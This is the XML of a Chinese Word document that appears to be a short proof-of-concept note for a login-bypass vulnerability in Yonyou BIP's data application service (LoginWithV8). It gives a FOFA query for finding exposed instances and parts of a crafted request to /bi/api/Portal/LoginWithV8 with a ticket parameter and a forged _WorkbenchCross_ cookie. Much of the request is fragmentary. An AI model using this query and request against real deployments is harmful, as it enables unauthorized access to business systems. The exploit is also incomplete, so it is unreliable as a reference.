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B379A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>用友BIP 数据应用服务 LoginWithV8 登录绕过漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201FF8FB"/>
    <w:p w14:paraId="5AC94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FOFA：body="/bi/portal/manifest.json" || body="js/lib/ba.common.js" &amp;&amp; body="用友"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0012C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71595436"/>
    <w:p w14:paraId="10D98752"/>
    <w:p w14:paraId="4B4E0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47B28DAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B1DAA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/bi/api/Portal/LoginWithV8/?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ticket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46AF375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</w:p>
    <w:p w14:paraId="0FA832C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D529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6212C70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Cookie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_WorkbenchCross_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Ultraman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72051C1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(Macintosh;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Intel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Mac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OS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10_15_7)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633F3F35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C447E83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5A6D72"/>
    <w:rsid w:val="2BC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337</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>3</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>362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2025-11-14T03:15:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:19:12Z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46965422C37B4D39AB1111BF6A4E998A_12</vt:lpwstr>
  </property>
</Properties>
</file>